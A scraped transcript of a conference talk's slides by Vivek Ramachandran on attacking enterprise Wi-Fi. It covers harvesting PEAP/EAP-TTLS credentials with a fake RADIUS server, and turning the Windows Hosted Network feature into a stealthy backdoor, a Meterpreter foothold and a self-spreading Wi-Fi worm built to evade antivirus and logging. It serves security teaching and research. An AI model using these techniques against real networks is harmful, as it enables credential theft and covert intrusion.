Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)
Post on 26-May-2015
3029 Views
Preview:
DESCRIPTION
Transcript
©SecurityTube.net
Scenario Based Hacking – Enterprise Wireless Security
Vivek Ramachandran
Founder, SecurityTube.net
vivek@securitytube.net
©SecurityTube.net
Vivek Ramachandran
WEP Cloaking Defcon 15
Caffe Latte Attack Toorcon 9
Microsoft Security Shootout
Wi-Fi Malware, 2011
802.1x, Cat65k Cisco Systems
B.Tech, ECE IIT Guwahati
Media Coverage CBS5, BBC
Trainer, 2011
©SecurityTube.net
In-Person Trainings
©SecurityTube.net
SecurityTube Online Certifications
25+ Countries
©SecurityTube.net
Free DVD (12+ Hours of HD Videos)
http://www.securitytube.net/downloads
©SecurityTube.net
Scenario Based Hacking
• Multiple courses are available from different certification bodies
• Concentrate more on tools than application
• Script kiddie mentality
• Real world scenarios are not used
• Student finds it tough to excel in the real world
©SecurityTube.net
The Real World
• Complicated scenario
• Heterogeneous architecture
• Multiple security controls present at the same time
– Firewalls, IDS/IPS, etc.
• Requires one to be a Master of all, rather than a Jack of all
• Basically “Scenario Based Hacking”
©SecurityTube.net
Understanding Scenario Based Hacking
Component Scenario 1 Scenario 2 Scenario 3 Scenario 4
Patches X Present Present Present
Personal Firewall X X Present Present
AV X X X Present
NAT X X X X
Firewall X X X X
IDS X X X X
IPS X X X X
WAF X X X X
…
…
©SecurityTube.net
Simple Scenarios
Internet
• No patches • No AV • No Firewall • No Network IDS/IPS • Direct Access (No NAT) • …..
©SecurityTube.net
Complicated
©SecurityTube.net
Interesting Ones!
Airport
Coffee Shop
©SecurityTube.net
Scenario Based Hacking for Wireless
• Enterprise Wireless Attacks
– PEAP
– EAP-TTLS
• Enterprise Rogue APs, Worms and Botnets
©SecurityTube.net
Enterprise Wireless Attacks PEAP and EAP-TTLS
©SecurityTube.net
WPA-Enterprise
Association
Authenticator Supplicant
Authentication Server
EAPoL Start
EAP Request Identity
EAP Response Identity
EAP Request Identity
EAP Packets
EAP Packets EAP Success
EAP Success PMK to AP
4 Way Handshake
Data Transfers
©SecurityTube.net
WPA-Enterprise
• Use a RADIUS server for authentication • Different supported EAP types – PEAP, EAP-TTLS, EAP-TLS etc. • De facto server
– FreeRadius www.freeradius.org
• Depending on EAP type used Client and Server will need to be configured
©SecurityTube.net
FreeRadius Wireless Pwnage Edition
http://www.willhackforsushi.com/FreeRADIUS-WPE.html
©SecurityTube.net
WPA/WPA2 Enterprise
EAP Type Real World Usage
PEAP Highest
EAP-TTLS High
EAP-TLS Medium
LEAP Low
EAP-FAST Low
…. ….
©SecurityTube.net
PEAP
• Protected Extensible Authentication Protocol • Typical usage:
– PEAPv0 with EAP-MSCHAPv2 (most popular) • Native support on Windows
– PEAPv1 with EAP-GTC
• Other uncommon ones – PEAPv0/v1 with EAP-SIM (Cisco)
• Uses Server Side Certificates for validation • PEAP-EAP-TLS
– Additionally uses Client side Certificates or Smartcards – Supported only by Microsoft
©SecurityTube.net Source: Layer3.wordpress.com
©SecurityTube.net
Understanding the Insecurity
• Server side certificates – Fake ones can be created – Clients may not prompt or user may accept invalid certificates
• Setup a Honeypot with FreeRadius-WPE – Client connects – Accepts fake certificate – Sends authentication details over MSCHAPv2 in the TLS tunnel – Attacker’s radius server logs these details – Apply dictionary / reduced possibility bruteforce attack using
Asleap by Joshua Wright
©SecurityTube.net
Windows PEAP Hacking Summed Up in 1 Slide
©SecurityTube.net
Demo of Enterprise Wireless Attacks PEAP
©SecurityTube.net
EAP-TTLS
• EAP-Tunneled Transport Layer Security
• Server authenticates with Certificate
• Client can optionally use Certificate as well
• No native support on Windows
– 3rd party utilities to be used
• Versions
– EAP-TTLSv0
– EAP-TTLSv1
©SecurityTube.net
Demo of Enterprise Wireless Attacks EAP-TTLS
©SecurityTube.net
Can I be Secure? EAP-TLS
• Strongest security of all the EAPs out there
• Mandates use of both Server and Client side certificates
• Required to be supported to get a WPA/WPA2 logo on product
• Unfortunately, this is not very popular due to deployment challenges
©SecurityTube.net
Enterprise Rogue APs, Backdoors, Worms and Botnets
©SecurityTube.net
• How Malware could leverage Wi-Fi to create
– Backdoors
– Worms
– Botnets
Objective
©SecurityTube.net
• Allows Client to connect to an Access Point
• First time user approves it, Auto-Connect for future instances
• Details are stored in Configuration Files
Background – Understanding Wi-Fi Client Software
©SecurityTube.net
Command Line Interaction?
• Scanning the air for stored profiles
• Profiling the clients based on searches
• Different clients behave differently
• Demo
©SecurityTube.net
See All Wi-Fi Interfaces
Netsh wlan show interfaces
©SecurityTube.net
Drivers and Capabilities
Netsh wlan show drivers
©SecurityTube.net
Scan for Available Networks
Netsh wlan show networks
©SecurityTube.net
View Existing Profiles
Netsh wlan show profiles
©SecurityTube.net
Starting a Profile
Netsh wlan connect name=“vivek”
©SecurityTube.net
Export a Profile
Netsh wlan export profile name=“vivek”
©SecurityTube.net
• Requirement for special drivers and supported cards
• Custom software used – HostAPd, Airbase-NG
• More feasible on Linux based systems
Creating an Access Point on a Client Device
©SecurityTube.net
• Available Windows 7 and Server 2008 R2 onwards • Virtual adapters on the same physical adapter • SoftAP can be created using virtual adapters
– DHCP server included
“With this feature, a Windows computer can use a single physical wireless adapter to connect as a client to a hardware access point (AP), while at the same time acting as a software AP allowing other wireless-capable devices to connect to it.” http://msdn.microsoft.com/en-us/library/dd815243%28v=vs.85%29.aspx
Generation 2.0 of Client Software – Hosted Network
©SecurityTube.net
Feature Objective
• To allow creation of a wireless Personal Area Network (PAN)
– Share data with devices
• Network connection sharing (ICS) with other devices on the network
©SecurityTube.net
Demo of Hosted Network
Demonstration
©SecurityTube.net
Creating a Hosted Network
©SecurityTube.net
Driver Support
©SecurityTube.net
Client still remains connected to hard AP!
©SecurityTube.net
Wi-Fi Backdoor
• Easy for malware to create a backdoor
• They key could be: – Fixed
– Derived based on MAC address of host, time of day etc.
• As host remains connected to authorized network, user does not notice a break in connection
• No Message or Prompt displayed
©SecurityTube.net
Understanding Rogue Access Points
Rogue AP
©SecurityTube.net
Makes a Rogue AP on every Client!
Rogue AP Rogue AP
Rogue AP
©SecurityTube.net
Best Part – No Extra Hardware!
©SecurityTube.net
Advantages?
Internet
©SecurityTube.net
Advantages?
Internet
Wicked Network
©SecurityTube.net
Why is this cool?
• Victim will never notice anything unusual unless he visits his network settings – has to be decently technical to understand
• Attacker connects to victim over a private network – no wired side network logs: firewalls, IDS, IPS – Difficult, if not impossible to trace back – Difficult to detect even while attack is ongoing
• Abusing legitimate feature, not picked up by AVs, Anti-Malware
• More Stealth? Monitor air for other networks, when a specific
network comes up, then start the Backdoor
©SecurityTube.net
Chaining Hosted Networks like a proxy?
• Each node has client and AP capability
• We can chain them to “hop” machines
• Final machine can provide Internet access
• Like Wi-Fi Repeaters
©SecurityTube.net
Chaining Infected Laptops
AP AP AP Client Client Client
Authorized AP
©SecurityTube.net
Package Meterpreter for full access?
• Once attacker connects to his victim, he would want to have access to everything
• Why not package a Meterpreter with this?
• How about a Backdoor post-exploitation script for Metasploit?
©SecurityTube.net
Demo
Coupling Hosted Network with Metasploit
©SecurityTube.net
• Passive Monitoring for SSIDs available
• Trigger SSID causes Wicked Hosted Network to start and create application level backdoor
• Attacker connects and does his job
• Shuts off Trigger SSID and Malware goes to Passive Monitoring again
Increasing Stealth
©SecurityTube.net
• Victim connects by mistake or misassociation
• Victim opens browser, Metasploit Browser_Autopwn exploits the system
• Hacker gets access!
• Biggest Challenge – Victim notices he is connected to the wrong network and disconnects himself
Karmetasploit
©SecurityTube.net
• Upon Exploitation, create the hosted network backdoor
• User disconnects, but this hosted network still remains active
• Attacker connects via this network
Enhancing Karmetasploit
©SecurityTube.net
What about older clients and other OSs?
• Windows < 7, Mac OS do not have the Hosted Network or alike feature
– Use Ad-Hoc networks
– Use Connect Back mechanism
• When a particular SSID is seen, connect to it automatically
• Blurb reporting “Connected to ABC”
– Could we kill it?
©SecurityTube.net
Hosted Network Meterpreter Scripts
http://zitstif.no-ip.org/meterpreter/rogueap.txt http://www.digininja.org/projects.php
©SecurityTube.net
Dissecting Worm Functionality
Exploit
Worm
Propagation Technique
©SecurityTube.net
Hosted Network Encryption
• Uses WPA2-PSK for encryption
• Key is encrypted in configuration file
• Can be decrypted
• What if there is an office network configured on the same machine with WPA2-PSK?
©SecurityTube.net
1. Infect Authorized Computer and Decrypt Passphrase
©SecurityTube.net
Decryption Routine
©SecurityTube.net
Alternate – Dump and Copy
©SecurityTube.net
2. Create a Soft Access Point with the same Credentials
OfficeAP OfficeAP
Worm Infected Laptop
©SecurityTube.net
3. Signal Strength Game
OfficeAP
OfficeAP
Worm Infected Laptop
©SecurityTube.net
4. Hop and Exploit
OfficeAP
Exploit
©SecurityTube.net
5. Replicate and Spread
OfficeAP
OfficeAP
©SecurityTube.net
Worms Wi-Fi Network Signal Strength > AP
OfficeAP OfficeAP
OfficeAP
OfficeAP OfficeAP
©SecurityTube.net
Wi-Fi Worm
• Retrieve the network key for the network
• Create a hosted network with the same name
• When the victim is in the vicinity of his office, worm can be activated
• At some point the signal strength may be higher than real AP
• Other colleagues laptops may hop and connect – Conference rooms, Coffee and Break areas
©SecurityTube.net
Why is this interesting?
• Worm uses its own private Wi-Fi network to propagate
• Does not use the Wired LAN at all
• Difficult for network defenses to detect and mitigate
• Targeted APT against an Enterprise
©SecurityTube.net
Demo
©SecurityTube.net
On the Run
©SecurityTube.net
APIs for the Hosted Network Feature
©SecurityTube.net
SecurityTube Online Certifications
25+ Countries
©SecurityTube.net
Free DVD (12+ Hours of HD Videos)
http://www.securitytube.net/downloads
top related